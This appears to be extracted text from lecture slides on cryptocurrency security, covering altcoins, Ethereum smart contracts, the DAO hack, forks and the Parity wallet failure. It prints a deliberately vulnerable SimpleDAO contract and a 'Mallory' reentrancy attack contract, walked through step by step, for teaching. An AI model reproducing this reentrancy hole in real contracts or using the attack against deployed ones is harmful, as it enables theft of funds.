More Attacks

http://blockchain.unica.it/projects/ethereum-survey/index.html http://hackingdistributed.com/2016/06/18/analysis-of-the-dao- exploit/ https://hackernoon.com/what-caused-the-latest-100-million- -bug-and-a-detection-tool-for-similar- bugs-7b80f8ab7279 Last Class

• Majority attacks

• Block withholding attacks

• Spam attacks

• Sybil attacks

• Blacklisting

• Fungibility

• Money laundering Last Class

• With the rise of 51% attacks:

• why? to what end?

• when will this stop?

• What are the points of centralization in this network?

• Is this inevitable?

• First altcoin: testnet

• Second altcoin: (DNS system)

• …

• over two thousand altcoins/tokens/etc. But… why?

• Improvements to Bitcoin

• Alternatives to Bitcoin

• Other functionality complementary to Bitcoin

• Make money for founders But… how?

• Altcoins: have their own

• Tokens: built on top of cryptocurrencies Alternative Mechanisms

:

• Cuckoo Cycle

• etc. Alternative functionality

• NameCoin: DNS system

• Ethereum: Turing complete

//others: “Private” Namecoin

• “completes” Zooko’s Triangle

• Blockchain-based DNS

• First of Bitcoin

• Merge mined with Bitcoin:

• same hash function

Ethereum

• Currently the second most popular cryptocurrency

• First proposed as a system built on top of Bitcoin

• Started to create turing-complete money contracts “smart contracts”

• Ether: currency which is input/output to contracts

• Gas: execution cost of instructions Smart Contracts

• Run on blockchain and executed by all nodes

• Created by posting a transaction

• Identified by address

• Can hold, receive, and send money

• Once deployed, cannot be changed Ethereum uses

• DApps

• Distributed applications

• CryptoKitties!

• Ponzi schemes!

• Tokens

• https://coinmarketcap.com/tokens/views/all/ The DAO

• Crowdfunding platform

• Envisioned as a leaderless organization

• Anybody could hold DAO tokens

• DAO creators together agreed on rules

• Raised 12.7M Ether ($150M) Simplified DAO

:

• high-level programming language to write smart contracts with

• python-ish

• Enter contract: donate

• Exit contract: withdraw

• Fallback option: Simplified DAO contract SimpleDAO { mapping (address => uint) public credit; function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; } function withdraw(uint amount) { if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }}} Attack contract Mallory { SimpleDAO public dao = SimpleDAO(0x354...); address owner; function Mallory(){owner = msg.sender; } function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Attack

contract SimpleDAO { mapping (address => uint) public credit; function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; }

Step 1: Attacker donates ether for Mallory. Attack contract Mallory { SimpleDAO public dao = SimpleDAO(0x354...); address owner; function Mallory(){owner = msg.sender; } function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Step 1: Attacker donates ether for Mallory. This triggers Mallory’s fallback. Attack

function withdraw(uint amount) { if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }

Step 2: Mallory’s fallback calls the withdraw function. Attack

function withdraw(uint amount) { if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }

Step 3: The withdraw function then invokes Mallory’s default again via call. Attack contract Mallory { SimpleDAO public dao = SimpleDAO(0x354...); address owner; function Mallory(){owner = msg.sender; } function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Step 4: We then attempt to withdraw again. The last call to withdraw was interrupted before it could update the credit field, so we still have ether to withdraw! Attack

• We can repeat ad nauseam until:

• contract gas is exhausted OR

• balance of DAO is zero. But wait!

7 days before drain started But wait!

5 days before drain started But wait!

• Code was attacked after it was patched.

• But how can that be?

• Remember: once deployed, cannot change Ethereum Price Shock Forks

• Fork: update in software

• Hard Fork

• requires software update; old version incompatible

• Soft Fork

• old version compatible with new software Forks

29 What to do next with Ethereum?

• Nothing

• Gas limit

• Ban spam addresses

• Soft Fork

• Hard Fork What happened next

https://www.ofnumbers.com/2016/07/28/ethereum-core-and- ethereum-classic-for-dummies/ Parity Multisig

• Ethereum Wallet

• One person “killing” a wallet killed every wallet that relied on the contract

Questions

• If we can’t secure code in a normal case, how will we be able to secure it on a blockchain?

• Do new create or centralization pressures? how?